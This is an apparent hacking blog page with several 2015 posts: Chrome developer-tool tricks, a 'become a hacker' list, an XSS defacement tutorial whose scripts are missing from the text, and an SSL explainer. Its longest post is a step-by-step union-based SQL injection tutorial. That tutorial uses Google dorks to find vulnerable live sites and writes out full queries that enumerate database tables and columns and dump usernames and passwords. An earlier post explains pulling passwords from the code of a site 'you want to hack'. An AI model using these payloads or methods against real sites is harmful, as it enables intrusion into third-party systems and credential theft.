Sunday, May 3, 2015

Simple Cool Tricks With Chrome Developer Tool

As you probably know, there is a button on the right-click menu of Google Chrome and IE 10+ called ''Inspect element''. This the developer tool. And you can have a lot of fun with it. I'll give you two examples on how to use it in this tutorial.

1. Change the text of a webpage:

You can have fun on webpages just by changing the value of a <span> (a text label). For example, go on the 4shared.com site (a free file sharing site). Then create an account if you don't have one (or just connect with Google, Facebook or Twitter). When you are done, upload something that is heavy (more than 100 MB) by dragging and dropping it on the home page of 4shared. Then you can see an uploading status window on the screen. So right-click on the percentage and click on ''Inspect element''. Now you can see a little window that appears on the bottom of the web browser. There are to ways : either you got the number or you got the % symbol. If you got the number, try to find the symbol below. Then double-click on it and type what you want (Eg: '',000,000 dollars in my bank account'')

2. Get a Non-Crypted password in JS/PhP code:

Some sites are not very safe and just verify the password directly in the PhP/JS code. Then, even if it become rare, you can get the password. Just follow these steps :Find the login form on the website you want to hackRight-click on it and then click on ''Inspect element''Search on the window that appeared ''<form'' and then ''action=''After it, there is a URL, If it ends by ''.js'', just copy it and paste it in the URL bar of your browserIf it ends by ''.php'', type ''view-source:'' before pasting the URLThen search something like ''password'' in the code.WARNING: This method works better with JS than with PHP. Sometimes, there is no URL after ''action='' but just a JS function. Then you have to press Ctrl+U to see the source and search for ''password'' in the whole code.

12 Simple Steps To Become A Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.Start Learning Linux

2. Code in C language 

C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.Top 6 Websites To Learn Computer Programming Languages

4. Learn Networking Concepts

Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.Understanding what LAN, WAN, VPN, Firewall is also important.You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.Decrypting Window 7 Password Using Ophcrack

7. Learn more and more about hacking

Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.Hackers Underground Hand Book Completely FreeHacking For Begineers Free Ebook

8. Experiment A Lot

After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.6 Most Common Password Cracking Methods And Their Countermeasures

10. Contribute To Open Source Security Projects

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

Friday, April 24, 2015

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSSand some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability? Never implement this technique. I am just explaining it for educational purpose only. Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it’s bad idea..! Script for chaning the background Color of a website: Script for chaning the background image of a website: Defacement Page with Pastehtml: First of all upload some defacement page(html) to pastehtml.co m and get the link. When you find a XSS vulnerable site, then insert the script as : This script will redirect the page to your pastehtml defacement page. Note: You can deface only persistent XSS vulnerable sites.

Wednesday, April 15, 2015

Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Facebook, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.


Secure Sockets Lock Tutorial | What is SSL | SSL Hackers Guide
Secure Sockets Lock Tutorial | What is SSL | SSL Hackers Guide


A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.


Cryptography


If two users want to have a secure communication they can also use cryptography to accomplish it

For example: 

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is “1“, What comes after S is T so as you can see that S is converted into T, What comes After is to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video – 






So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data.




Standard Communication VS Secure communication 


Suppose there exists two communication parties A (client) and B (server) 


Standard communication(HTTP)


When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say “Password” it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.

This scenario is illustrated using the following figure -



Standard Communications HTTP
Standard Communications HTTP



Secure communication(HTTPS) 


In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure – 


Secure communication(HTTPS)
Secure communication(HTTPS) 




How is HTTPS implemented?


HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?


The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate.




How to identify a Secure Connection?


In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website. 

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8

SQL Injection flaw is quite easiest to exploit and protect too but only when you know how to do it. In continuation to our Injection attacks tutorial series, today we will learn about Union Exploitation Technique to exploit SQL Injection Vulnerability. Union exploitation technique is most common and easiest way to exploit SQL injection vulnerability to hack into websites and if you know how to do it then its same the other way around i.e. Protect SQL Injection vulnerability to be exploited by Union Exploitation technique. So lets learn about Union Exploitation Technique in detail with help of examples.
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks - Part 8
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8.
Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.
But before that let me brief all of you about what is Union Operator? Union is an inbuilt keyword in almost all databases which is used to join a query. In SQL, we normally used Union operator to link another SQL query with original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries to retrieve information like usernames, passwords and other juicy information from victims databases.
Here’s a brief about procedure that we are going to learn to exploit SQL Injection using Union Exploitation Technique:
1. Find the Vulnerable website which is vulnerable to SQL Injection.
2. Find the Number of Columns in website using Order by clause.
3. Find most vulnerable columns which can be used to exploit SQL Injection Vulnerability using Union operator.
4. Test run to validate that column found is vulnerable by querying version information.
5. Use Information Schema to get Table Names
6. Use Information Schema to get Column Names
7. Use Information Schema to get Column values. For example: Username, passwords, customer information.
Oops…. That’s it all about Union Exploitation technique to exploit SQL injection vulnerability to own or hack any vulnerable website. Now lets learn in detail how to use union Exploitation technique to Exploit SQL Injection Vulnerability.Let’s learn the process in detail.Union Exploitation Technique to Exploit SQL Injection Vulnerability:

Step 1: Finding SQL injection vulnerable websites:

We have already learned this in our previous articles, if somebody missed here is brief:
Use Google to find Vulnerable website by searching for below query :
inurl:php?id=
There are several other dorks to find SQL injection vulnerable websites but above one is easiest and success rate almost 90-95%.
Now Google search will display some results. Open any one of them, say
www.example.com/shop.php?id=6
Now to check if its vulnerable to SQL Injection or not, just add ‘(single quote) at end of it i.e. query will become something like below:
www.example.com/shop.php?id=6′
Now if you get error something like below, then it means website is vulnerable to SQL Injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
or something like below:
Query failed: You have an error in your SQL syntax near ”6”’ at line 1
or any other error.

Step 2: Finding Exact Number Columns in Website

Once you know that website is vulnerable to SQL Injection, next step is to find exact number of columns in website database. Which you can know by running below query :
www.example.com/shop.php?id=6 ORDER BY <NUM>–
Now say website has 16 columns, which you don’t know then you can get it by using binary search approach. For example running below manner sequences:
www.example.com/shop.php?id=6 ORDER BY 10–
Result : Some page opens with data i.e. no error page.Then incrementing it by 10 i.e.
www.example.com/shop.php?id=6 ORDER BY 20–
and so on until you get below error message :
Unknown column ‘<NUM>’ in ‘order clause’
or any other custom message.Once you get the above error message, then it means you exceeded the exact column numbers so decrease it one by once until to error is gone. Last successful page means exact column count. Say you get 16 columns. Then last successful request executed must be :
www.example.com/shop.php?id=6 ORDER BY 16–
This steps will give exact number of columns in the database of website.

Step 3: Finding Vulnerable Columns using UNION ALL clause.

Once you know the exact number of columns in database then you can get list of all vulnerable columns  by running below query:
www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–
This will result in some page and on that page some numbers will be displayed. Those are actually vulnerable columns. Now say 2, 4 and 8 are displayed on page. This means column 2, column 4 and column 8 are most vulnerable columns which can be used to run your own SQL queries.If above query execution shows normal web page as it usually displays then it means query is failed. Then we used field exploitation technqiue by inserting ‘-‘ in ID value. So the query will become something like below:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–
Wow, now you have some numbers scattered over web page, which means vulnerable columns on website.

Step 4: Test run to validate vulnerable columns

Now we have list of all vulnerable columns, next step will be validating that we are correct.Easiest way to validate is executing version() command in vulnerable column, for example, say column 2 was vulnerable:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16–
Now in place of 2 on web page you will get the version number displayed. Check this for all vulnerable columns.

Step 5: Use information Schema to get Table Names

Now we know vulnerable columns of database, next step will be extracting table names from the database. This can be achieved by knowing concepts of Information schema.Learn more about information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using information schema we can execute query as if we are administrators. So in order to extract table names we will run below query on column 2 (vulnerable column).
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()–
Above query will give you complete list of tables present in the database. You know which table you need to search for Username and passwords :D.Step 6: Use information schema to get Column namesUsing the same concept used in step 5, we will use information schema to extract column names too.Learn more about Information Schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now to extract column names from database, below query will work like Bulls Eye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()–
The above query will result into extracting all column names.Step 7: Use Information Schema concept to get column values of required tableWell till now we have table names, column names. Only thing left is data from tables. Now say we got some table as USERS which has column names USERNAME and PASSWORD. In order to extract data from USERS table below query is sufficient :
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS–
Above query will result into displaying usernames and passwords in below format username:password as 0x3a is hex value for ‘:’.That’s it guys, now you have username, password, table names, passwords. What else do you need.That’s all for today, we will continue to learn more about injection attacks in later tutorials.If you have any queries of doubts, feel free to ask.